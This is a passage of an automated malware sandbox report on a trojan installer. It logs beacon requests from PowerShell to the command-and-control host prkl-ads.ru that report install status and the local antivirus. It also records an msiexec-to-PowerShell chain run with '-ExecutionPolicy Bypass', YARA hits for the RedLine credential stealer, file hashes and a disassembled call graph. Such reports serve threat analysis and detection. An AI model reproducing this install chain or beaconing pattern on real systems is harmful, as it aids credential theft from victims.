                                                                                                                                                                      Aug 21, 2023 19:35:23.815943003 CEST5419353192.168.2.38.8.8.8
                                                                                                                                                                      Aug 21, 2023 19:35:23.979336023 CEST53541938.8.8.8192.168.2.3

                                                                                                                                                                      DNS Queries

                                                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                      Aug 21, 2023 19:35:21.405807972 CEST192.168.2.38.8.8.80xfa03Standard query (0)prkl-ads.ruA (IP address)IN (0x0001)false
                                                                                                                                                                      Aug 21, 2023 19:35:23.815943003 CEST192.168.2.38.8.8.80x36a8Standard query (0)prkl-ads.ruA (IP address)IN (0x0001)false

                                                                                                                                                                      DNS Answers

                                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                      Aug 21, 2023 19:35:21.497184992 CEST8.8.8.8192.168.2.30xfa03No error (0)prkl-ads.ru81.177.140.69A (IP address)IN (0x0001)false
                                                                                                                                                                      Aug 21, 2023 19:35:23.979336023 CEST8.8.8.8192.168.2.30x36a8No error (0)prkl-ads.ru81.177.140.69A (IP address)IN (0x0001)false

                                                                                                                                                                      HTTP Request Dependency Graph

                                                                                                                                                                      • prkl-ads.ru

                                                                                                                                                                      HTTPS Proxied Packets

                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                      0192.168.2.34972381.177.140.69443C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                      2023-08-21 17:35:21 UTC0OUTGET /?status=reg&key=llks74638sj&site=Test HTTP/1.1
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
                                                                                                                                                                      Host: prkl-ads.ru
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      2023-08-21 17:35:21 UTC0INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Mon, 21 Aug 2023 17:35:21 GMT
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Server: Apache/2.4.6 (CentOS) PHP/7.4.33
                                                                                                                                                                      X-Powered-By: PHP/7.4.33


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                      1192.168.2.34972481.177.140.69443C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                      2023-08-21 17:35:24 UTC0OUTGET /?status=start&av=Windows%20Defender HTTP/1.1
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
                                                                                                                                                                      Host: prkl-ads.ru
                                                                                                                                                                      2023-08-21 17:35:24 UTC0INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Mon, 21 Aug 2023 17:35:24 GMT
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Server: Apache/2.4.6 (CentOS) PHP/7.4.33
                                                                                                                                                                      X-Powered-By: PHP/7.4.33


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                      2192.168.2.34972581.177.140.69443C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                      2023-08-21 17:35:24 UTC0OUTGET /?status=install HTTP/1.1
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
                                                                                                                                                                      Host: prkl-ads.ru
                                                                                                                                                                      2023-08-21 17:35:24 UTC0INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Mon, 21 Aug 2023 17:35:24 GMT
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Server: Apache/2.4.6 (CentOS) PHP/7.4.33
                                                                                                                                                                      X-Powered-By: PHP/7.4.33


                                                                                                                                                                      Statistics

                                                                                                                                                                      CPU Usage

                                                                                                                                                                      Click to jump to process

                                                                                                                                                                      Memory Usage

                                                                                                                                                                      Click to jump to process

                                                                                                                                                                      High Level Behavior Distribution

                                                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                                                      Behavior

                                                                                                                                                                      Click to jump to process

                                                                                                                                                                      System Behavior

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:0
                                                                                                                                                                      Start time:19:35:12
                                                                                                                                                                      Start date:21/08/2023
                                                                                                                                                                      Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe
                                                                                                                                                                      Imagebase:0xbb0000
                                                                                                                                                                      File size:7'465'048 bytes
                                                                                                                                                                      MD5 hash:19124312CAFA0B1C5524329755A5D6A2
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:low
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:1
                                                                                                                                                                      Start time:19:35:14
                                                                                                                                                                      Start date:21/08/2023
                                                                                                                                                                      Path:C:\Windows\System32\msiexec.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                      Imagebase:0x7ff744670000
                                                                                                                                                                      File size:66'048 bytes
                                                                                                                                                                      MD5 hash:4767B71A318E201188A0D0A420C8B608
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high
                                                                                                                                                                      Has exited:false

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:2
                                                                                                                                                                      Start time:19:35:15
                                                                                                                                                                      Start date:21/08/2023
                                                                                                                                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 3407EF71A9E7EFAA675EDBEA938667C8 C
                                                                                                                                                                      Imagebase:0xf00000
                                                                                                                                                                      File size:59'904 bytes
                                                                                                                                                                      MD5 hash:12C17B5A5C2A7B97342C362CA467E9A2
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:3
                                                                                                                                                                      Start time:19:35:15
                                                                                                                                                                      Start date:21/08/2023
                                                                                                                                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:"C:\Windows\system32\msiexec.exe" /i "C:\Users\user\AppData\Roaming\Helper Company LLC\Helper 1.0.0\install\Helper.msi" AI_SETUPEXEPATH=C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe SETUPEXEDIR=C:\Users\user\Desktop\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1692671532 "
                                                                                                                                                                      Imagebase:0xf00000
                                                                                                                                                                      File size:59'904 bytes
                                                                                                                                                                      MD5 hash:12C17B5A5C2A7B97342C362CA467E9A2
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:4
                                                                                                                                                                      Start time:19:35:17
                                                                                                                                                                      Start date:21/08/2023
                                                                                                                                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding AADEFB259C244F0AA7BE078D54CFCDDA
                                                                                                                                                                      Imagebase:0xf00000
                                                                                                                                                                      File size:59'904 bytes
                                                                                                                                                                      MD5 hash:12C17B5A5C2A7B97342C362CA467E9A2
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:5
                                                                                                                                                                      Start time:19:35:18
                                                                                                                                                                      Start date:21/08/2023
                                                                                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss77D9.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi77C5.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr77D6.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr77D7.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
                                                                                                                                                                      Imagebase:0x1150000
                                                                                                                                                                      File size:430'592 bytes
                                                                                                                                                                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                                                                                      Yara matches:
                                                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      Reputation:high
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:6
                                                                                                                                                                      Start time:19:35:18
                                                                                                                                                                      Start date:21/08/2023
                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      Imagebase:0x7ff766460000
                                                                                                                                                                      File size:625'664 bytes
                                                                                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Disassembly

                                                                                                                                                                      Reset < >

                                                                                                                                                                        Execution Graph

                                                                                                                                                                        Execution Coverage:5.9%
                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                        Signature Coverage:23.2%
                                                                                                                                                                        Total number of Nodes:1324
                                                                                                                                                                        Total number of Limit Nodes:62
                                                                                                                                                                        execution_graph 45482 c28d40 45492 bc8cf0 EnterCriticalSection 45482->45492 45484 c28d4e 45485 c28d48 45485->45484 45488 c28d70 45485->45488 45503 d7fa13 GetProcessHeap HeapAlloc 45485->45503 45489 c28d7f 45488->45489 45496 d7fb15 45488->45496 45490 c28d87 SetWindowLongW 45489->45490 45491 c28da2 45490->45491 45493 bc8d40 GetCurrentThreadId 45492->45493 45494 bc8d73 LeaveCriticalSection 45492->45494 45495 bc8d50 45493->45495 45494->45485 45495->45494 45497 d7fb20 45496->45497 45502 d7fb37 45496->45502 45498 d7fb2c 45497->45498 45499 d7fb39 45497->45499 45497->45502 45527 d7f87c GetCurrentProcess FlushInstructionCache 45498->45527 45513 d7f7a5 45499->45513 45502->45489 45504 d7fa2f 45503->45504 45505 d7fa2b 45503->45505 45506 d7f7a5 5 API calls 45504->45506 45505->45488 45507 d7fa3a 45506->45507 45508 d7fa56 45507->45508 45512 d7fa4a 45507->45512 45531 d7f8b1 15 API calls __Wcscoll 45508->45531 45510 d7fa74 45510->45488 45511 d7fa63 GetProcessHeap HeapFree 45511->45505 45512->45510 45512->45511 45514 d7f7b2 RtlDecodePointer 45513->45514 45515 d7f7bf LoadLibraryExA 45513->45515 45514->45502 45516 d7f850 45515->45516 45517 d7f7d8 45515->45517 45516->45502 45528 d7f855 GetProcAddress 45517->45528 45519 d7f7e8 45519->45516 45520 d7f855 2 API calls 45519->45520 45521 d7f7ff 45520->45521 45521->45516 45522 d7f855 2 API calls 45521->45522 45523 d7f816 45522->45523 45523->45516 45524 d7f855 2 API calls 45523->45524 45525 d7f82d 45524->45525 45525->45516 45526 d7f834 DecodePointer 45525->45526 45526->45516 45527->45502 45529 d7f86c RtlEncodePointer 45528->45529 45530 d7f868 45528->45530 45529->45519 45530->45519 45531->45512 45532 cb4260 45533 cb44c7 45532->45533 45534 cb42ac 45532->45534 45557 bbab90 45534->45557 45537 cb454d 45633 bba850 45537->45633 45538 cb42e0 45541 cb42fb 45538->45541 45543 cb4309 45538->45543 45540 cb4557 45623 bba140 45541->45623 45543->45543 45632 bba6d0 26 API calls 2 library calls 45543->45632 45545 cb4307 45569 bb8810 45545->45569 45547 cb4339 CreateFileW 45548 cb436b CloseHandle 45547->45548 45549 cb4389 45547->45549 45548->45533 45573 bed4d0 15 API calls 45549->45573 45551 cb4392 45574 cb4560 45551->45574 45553 cb43a5 WriteFile 45554 cb43d5 45553->45554 45555 cb440d CloseHandle 45554->45555 45556 cb441b 45554->45556 45555->45556 45556->45533 45558 bbabc8 45557->45558 45559 bbac1c 45557->45559 45636 d80372 EnterCriticalSection 45558->45636 45561 bbaca7 45559->45561 45563 d80372 6 API calls 45559->45563 45561->45537 45561->45538 45562 bbabd2 45562->45559 45564 bbabde GetProcessHeap 45562->45564 45567 bbac36 45563->45567 45565 bbac0b 45564->45565 45641 d80328 EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 45565->45641 45567->45561 45642 d80328 EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 45567->45642 45570 bb885e std::ios_base::_Ios_base_dtor 45569->45570 45572 bb883d 45569->45572 45570->45547 45572->45547 45572->45569 45572->45570 45644 d852ff 45572->45644 45573->45551 45575 bbab90 12 API calls 45574->45575 45576 cb459a 45575->45576 45577 cb461e 45576->45577 45578 cb45a0 45576->45578 45579 bba850 HeapAlloc 45577->45579 45581 cb45eb 45578->45581 45582 cb45ce 45578->45582 45580 cb4628 45579->45580 45651 ccc960 45580->45651 45660 cb6300 38 API calls 45581->45660 45659 cb6300 38 API calls 45582->45659 45585 cb45e6 45585->45553 45589 cb468e 45590 cb46f0 45589->45590 45591 cb4b90 47 API calls 45589->45591 45592 cb4710 GetModuleHandleW 45590->45592 45593 cb46a9 45591->45593 45594 cb477c 45592->45594 45595 cb4744 45592->45595 45596 bd1a90 26 API calls 45593->45596 45600 cb47d4 45594->45600 45603 d80372 6 API calls 45594->45603 45598 d80372 6 API calls 45595->45598 45597 cb46b6 MoveFileW 45596->45597 45602 ccc960 HeapAlloc FindFirstFileW GetLastError FindClose 45597->45602 45601 cb474e 45598->45601 45610 d80372 6 API calls 45600->45610 45620 cb482c 45600->45620 45601->45594 45604 cb475a GetProcAddress 45601->45604 45605 cb46e8 45602->45605 45606 cb47a6 45603->45606 45607 d80328 __Init_thread_footer 5 API calls 45604->45607 45605->45590 45608 cb4a71 45605->45608 45606->45600 45609 cb47b2 GetProcAddress 45606->45609 45611 cb4779 45607->45611 45612 d8b6e4 13 API calls 45608->45612 45613 d80328 __Init_thread_footer 5 API calls 45609->45613 45614 cb47fe 45610->45614 45611->45594 45616 cb4a7b 45612->45616 45618 cb47d1 45613->45618 45615 cb480a GetProcAddress 45614->45615 45614->45620 45619 d80328 __Init_thread_footer 5 API calls 45615->45619 45617 c8a630 96 API calls 45617->45620 45618->45600 45621 cb4829 45619->45621 45620->45617 45622 cb4a05 45620->45622 45621->45620 45622->45553 45624 bba150 45623->45624 45625 bba1d2 45624->45625 45626 bba156 FindResourceW 45624->45626 45625->45545 45626->45625 45627 bba16d 45626->45627 45673 bba000 LoadResource LockResource SizeofResource 45627->45673 45630 bba177 45630->45625 45674 d89907 25 API calls 2 library calls 45630->45674 45631 bba1ae 45631->45545 45632->45545 45634 bba85d 45633->45634 45635 bba86a HeapAlloc 45634->45635 45635->45540 45640 d80386 45636->45640 45637 d8038b LeaveCriticalSection 45637->45562 45640->45637 45643 d803fa SleepConditionVariableCS LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 45640->45643 45641->45559 45642->45561 45643->45640 45649 d8523b 25 API calls __cftof 45644->45649 45646 d8530e 45650 d8531c 6 API calls __Wcscoll 45646->45650 45648 d8531b 45649->45646 45650->45648 45661 ccc9a0 45651->45661 45653 cb4680 45654 bba380 45653->45654 45655 bba38b 45654->45655 45672 bba610 26 API calls 45655->45672 45657 bba43f 45658 bba380 26 API calls 45657->45658 45659->45585 45660->45585 45664 ccc9dc 45661->45664 45665 ccc9e4 45661->45665 45662 cccad1 45663 bba850 HeapAlloc 45662->45663 45666 cccadb 45663->45666 45664->45653 45665->45662 45665->45664 45667 ccca14 __Wcscoll 45665->45667 45667->45664 45668 ccca32 FindFirstFileW 45667->45668 45669 ccca7e GetLastError 45668->45669 45670 ccca61 45668->45670 45669->45670 45670->45664 45671 ccca9b FindClose 45670->45671 45671->45664 45672->45657 45673->45630 45674->45631 45675 ccb960 45711 cca0b0 25 API calls 45675->45711 45677 ccb99f 45678 bb8810 25 API calls 45677->45678 45679 ccb9df 45678->45679 45681 ccbc48 45679->45681 45682 ccba19 std::ios_base::_Ios_base_dtor __Wcscoll 45679->45682 45680 ccbac9 45712 cd4b10 45680->45712 45684 d852ff 25 API calls 45681->45684 45698 ccba73 45682->45698 45738 bc89f0 25 API calls 45682->45738 45683 ccbaaf 45739 cd62f0 55 API calls 3 library calls 45683->45739 45687 ccbc4d 45684->45687 45691 d852ff 25 API calls 45687->45691 45688 ccbada 45740 bb8190 45688->45740 45694 ccbc52 45691->45694 45692 ccbb11 45748 cca0b0 25 API calls 45692->45748 45693 ccbac6 45693->45680 45696 bb8190 25 API calls 45694->45696 45699 ccbcb9 45696->45699 45697 ccbb25 45749 cd29a0 43 API calls 3 library calls 45697->45749 45698->45680 45698->45683 45750 d81ad5 26 API calls __Wcscoll 45699->45750 45702 ccbccc 45751 cd62f0 55 API calls 3 library calls 45702->45751 45704 ccbcdb 45705 ccbbdf std::ios_base::_Ios_base_dtor 45706 bb8810 25 API calls 45705->45706 45708 ccbc15 45706->45708 45707 ccbb45 std::ios_base::_Ios_base_dtor 45707->45687 45707->45705 45709 bb8810 25 API calls 45708->45709 45710 ccbc27 45709->45710 45711->45677 45752 bb8700 45712->45752 45714 cd4bb9 __Wcscoll 45715 cd4bea LoadStringW 45714->45715 45716 cd4c19 45715->45716 45723 cd4c43 __Wcscoll 45715->45723 45717 bb8190 25 API calls 45716->45717 45719 cd4c3a 45717->45719 45718 cd4c98 LoadStringW 45720 cd4caf 45718->45720 45718->45723 45721 cd4ce5 std::ios_base::_Ios_base_dtor 45719->45721 45725 bb8810 25 API calls 45719->45725 45724 bb8190 25 API calls 45720->45724 45726 cd4d87 std::ios_base::_Ios_base_dtor 45721->45726 45727 d852ff 25 API calls 45721->45727 45723->45718 45767 cd4e80 26 API calls __Wcscoll 45723->45767 45724->45719 45725->45721 45726->45688 45728 cd4dcb 45727->45728 45729 cd4e6e 45728->45729 45731 cd4e09 SysFreeString 45728->45731 45732 cd4e51 SysAllocStringLen 45728->45732 45730 bba850 HeapAlloc 45729->45730 45733 cd4e78 45730->45733 45737 cd4e4d 45731->45737 45732->45731 45734 cd4e64 45732->45734 45735 bba850 HeapAlloc 45734->45735 45735->45729 45737->45688 45738->45698 45739->45693 45742 bb8217 45740->45742 45743 bb81a0 45740->45743 45741 bb81ac 45741->45692 45744 bb8190 25 API calls 45742->45744 45743->45741 45745 bb8700 25 API calls 45743->45745 45746 bb826f 45744->45746 45747 bb81ee 45745->45747 45746->45692 45747->45692 45748->45697 45749->45707 45750->45702 45751->45704 45753 bb874b 45752->45753 45754 bb870b 45752->45754 45772 bb86e0 25 API calls 45753->45772 45756 bb8736 45754->45756 45757 bb8714 45754->45757 45758 bb8746 45756->45758 45768 d7fea9 45756->45768 45757->45753 45759 bb871b 45757->45759 45758->45714 45762 d7fea9 2 API calls 45759->45762 45761 d852ff 25 API calls 45764 bb8755 45761->45764 45765 bb8721 45762->45765 45763 bb8740 45763->45714 45765->45761 45766 bb872a 45765->45766 45766->45714 45767->45723 45769 d7feae 45768->45769 45771 d7fec8 45769->45771 45773 d954d3 EnterCriticalSection LeaveCriticalSection __cftof 45769->45773 45771->45763 45772->45765 45773->45769 45774 cda7e0 45775 cda815 45774->45775 45776 cda8d9 45774->45776 45777 cda8c1 45775->45777 45788 ce14b0 45775->45788 45780 bd1a90 26 API calls 45777->45780 45779 cda82d 45809 bd1a90 45779->45809 45780->45776 45782 cda83f 45783 bd1a90 26 API calls 45782->45783 45784 cda87c 45783->45784 45784->45776 45784->45777 45785 cda915 45784->45785 45786 bba850 HeapAlloc 45785->45786 45787 cda91f 45786->45787 45789 bbab90 12 API calls 45788->45789 45808 ce14ec 45789->45808 45790 ce193f 45791 bba850 HeapAlloc 45790->45791 45792 ce1949 45791->45792 45793 bba850 HeapAlloc 45792->45793 45795 ce1953 45793->45795 45794 ce154e 45898 bc4bd0 45794->45898 45797 ce18d5 45797->45779 45798 bd11b0 94 API calls 45798->45808 45799 bc4e60 82 API calls 45799->45808 45800 bba6d0 26 API calls 45800->45808 45802 bba380 26 API calls 45802->45808 45803 bbab90 12 API calls 45803->45808 45806 bd1a90 26 API calls 45806->45808 45808->45790 45808->45792 45808->45794 45808->45798 45808->45799 45808->45800 45808->45802 45808->45803 45808->45806 45818 ce1960 45808->45818 45915 cae930 38 API calls ___std_exception_destroy 45808->45915 45916 ccd5c0 HeapAlloc GetEnvironmentVariableW GetEnvironmentVariableW 45808->45916 45917 cff180 87 API calls _wcsrchr 45808->45917 45810 bd1aa6 45809->45810 45811 bd1af3 45809->45811 45812 bd1ae0 45810->45812 45813 bd1ab6 45810->45813 45811->45782 45979 bba6d0 26 API calls 2 library calls 45812->45979 45815 bba380 26 API calls 45813->45815 45817 bd1abc 45815->45817 45816 bd1aeb 45816->45782 45817->45782 45820 ce19a1 45818->45820 45819 ce1a8a 45822 bbab90 12 API calls 45819->45822 45820->45819 45821 bba380 26 API calls 45820->45821 45824 ce19df 45821->45824 45823 ce1aba 45822->45823 45831 ce1aeb 45823->45831 45832 ce1af6 45823->45832 45893 ce21d5 45823->45893 45923 ccd5c0 HeapAlloc GetEnvironmentVariableW GetEnvironmentVariableW 45824->45923 45826 bba850 HeapAlloc 45828 ce1a1b 45826->45828 45827 ce19ff 45827->45819 45829 ce1a07 45827->45829 45830 bba850 HeapAlloc 45828->45830 45842 ce1a37 45828->45842 45833 bd1a90 26 API calls 45829->45833 45834 ce2204 45830->45834 45835 bba140 29 API calls 45831->45835 45924 bba6d0 26 API calls 2 library calls 45832->45924 45833->45828 45964 d80658 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess IsProcessorFeaturePresent 45834->45964 45838 ce1af4 45835->45838 45918 bc49d0 45838->45918 45839 ce2209 45842->45808 45843 ce1b4a SHGetFolderPathW 45844 ce1b74 45843->45844 45844->45844 45925 bba6d0 26 API calls 2 library calls 45844->45925 45845 bbab90 12 API calls 45846 ce1bce 45845->45846 45849 ce1bff 45846->45849 45850 ce1c0a 45846->45850 45846->45893 45848 ce1b92 45848->45828 45848->45845 45851 bba140 29 API calls 45849->45851 45926 bba6d0 26 API calls 2 library calls 45850->45926 45853 ce1c08 45851->45853 45854 bc49d0 HeapAlloc 45853->45854 45855 ce1c2a 45854->45855 45856 ce1c54 GetSystemDirectoryW 45855->45856 45863 ce1c85 45855->45863 45856->45834 45856->45863 45857 bbab90 12 API calls 45857->45863 45858 bba6d0 26 API calls 45858->45863 45859 bba140 29 API calls 45859->45863 45860 bc49d0 HeapAlloc 45860->45863 45861 ce1d54 GetWindowsDirectoryW 45861->45834 45861->45863 45862 ce1db0 45864 bbab90 12 API calls 45862->45864 45863->45857 45863->45858 45863->45859 45863->45860 45863->45861 45863->45862 45863->45893 45865 ce1db5 45864->45865 45866 ce1de6 45865->45866 45867 ce1df1 45865->45867 45865->45893 45869 bba140 29 API calls 45866->45869 45927 bba6d0 26 API calls 2 library calls 45867->45927 45870 ce1def 45869->45870 45871 bc49d0 HeapAlloc 45870->45871 45872 ce1e11 45871->45872 45873 ce1e39 GetWindowsDirectoryW 45872->45873 45874 ce1e60 45872->45874 45873->45874 45876 ce1f29 45874->45876 45928 bc0ec0 45874->45928 45877 ce1f7e GetModuleFileNameW 45876->45877 45878 ce1ff6 45876->45878 45896 ce2002 45876->45896 45880 ce1f97 45877->45880 45879 bd1a90 26 API calls 45878->45879 45879->45896 45880->45834 45961 bba6d0 26 API calls 2 library calls 45880->45961 45881 ce1ebe 45960 bba6d0 26 API calls 2 library calls 45881->45960 45883 ce1f08 45884 bb8810 25 API calls 45883->45884 45886 ce1f17 45884->45886 45888 bb8810 25 API calls 45886->45888 45887 ce2062 SHGetSpecialFolderLocation 45889 ce218f SHGetPathFromIDListW SHGetMalloc 45887->45889 45887->45896 45888->45876 45889->45896 45890 ce20f7 LoadLibraryW 45892 ce210e 45890->45892 45891 d80372 6 API calls 45891->45896 45894 ce2128 GetProcAddress 45892->45894 45892->45896 45893->45826 45894->45896 45896->45887 45896->45889 45896->45890 45896->45891 45896->45893 45962 d80328 EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 45896->45962 45963 ce2210 66 API calls 45896->45963 45899 bc4c15 45898->45899 45900 bc4c46 45898->45900 45901 bba380 26 API calls 45899->45901 45903 bbab90 12 API calls 45900->45903 45911 bc4c57 45900->45911 45902 bc4c1a 45901->45902 45902->45797 45903->45911 45904 bc4d31 45905 bba850 HeapAlloc 45904->45905 45908 bc4d3b 45905->45908 45906 bc4d22 45907 bba850 HeapAlloc 45906->45907 45909 bc4d2c 45907->45909 45978 bba610 26 API calls 45909->45978 45911->45904 45911->45906 45911->45909 45912 bc4cb5 __Wcscoll 45911->45912 45913 bc4cd1 45912->45913 45977 d852ef 25 API calls __cftof 45912->45977 45913->45797 45915->45808 45916->45808 45917->45808 45919 bc4a51 45918->45919 45922 bc49f8 45918->45922 45920 bba850 HeapAlloc 45919->45920 45921 bc4a5b 45920->45921 45922->45843 45922->45848 45923->45827 45924->45838 45925->45848 45926->45853 45927->45870 45929 bc0f2e 45928->45929 45942 bc0f66 45928->45942 45930 d80372 6 API calls 45929->45930 45938 bc0f38 45930->45938 45931 bc0fcd 45934 bc0fe6 GetTempPathW 45931->45934 45939 bc0fd6 45931->45939 45933 d80372 6 API calls 45936 bc0f8d 45933->45936 45934->45939 45935 bc10ca 45935->45881 45936->45931 45937 bc0f99 GetModuleHandleW GetProcAddress 45936->45937 45966 d80328 EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 45937->45966 45938->45942 45965 d80328 EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 45938->45965 45944 bb8190 25 API calls 45939->45944 45948 bc1097 std::ios_base::_Ios_base_dtor 45939->45948 45942->45931 45942->45933 45942->45948 45943 bc0fca 45943->45931 45945 bc1049 45944->45945 45967 cbecc0 25 API calls 45945->45967 45947 bc1061 45947->45948 45949 bc10fb 45947->45949 45968 bb7690 45948->45968 45950 d852ff 25 API calls 45949->45950 45951 bc1100 45950->45951 45952 bc0ec0 36 API calls 45951->45952 45953 bc1154 45952->45953 45954 bb7690 25 API calls 45953->45954 45955 bc116b 45954->45955 45956 bb8810 25 API calls 45955->45956 45957 bc118c 45956->45957 45958 bb8810 25 API calls 45957->45958 45959 bc11b3 45958->45959 45959->45881 45960->45883 45961->45878 45962->45896 45963->45896 45964->45839 45965->45942 45966->45943 45967->45947 45969 bb76b6 45968->45969 45970 bb772f 45969->45970 45971 bb76c1 45969->45971 45973 bb775e 45970->45973 45975 bb8810 25 API calls 45970->45975 45972 bb76cd 45971->45972 45974 bb8700 25 API calls 45971->45974 45972->45935 45973->45935 45976 bb770c 45974->45976 45975->45970 45976->45935 45977->45913 45978->45904 45979->45816 45980 cd6f60 45989 cd6b40 45980->45989 45982 cd6fa1 GetFileVersionInfoSizeW 45983 cd701e GetLastError 45982->45983 45984 cd6fba 45982->45984 45985 cd6fca 45983->45985 45984->45985 45987 cd6fd1 GetFileVersionInfoW 45984->45987 45986 cd7030 DeleteFileW 45985->45986 45988 cd7037 45985->45988 45986->45988 45987->45983 45987->45985 45990 cd6b7e 45989->45990 45991 cd6b86 SHGetFolderPathW 45990->45991 45993 cd6d79 45990->45993 45992 cd6ba4 45991->45992 45992->45993 45994 bc0ec0 39 API calls 45992->45994 45993->45982 45995 cd6c12 __Wcscoll 45994->45995 45996 cd6c4d GetTempFileNameW 45995->45996 45997 bb8810 25 API calls 45996->45997 45999 cd6c71 45997->45999 45998 cd6ce3 Wow64DisableWow64FsRedirection CopyFileW 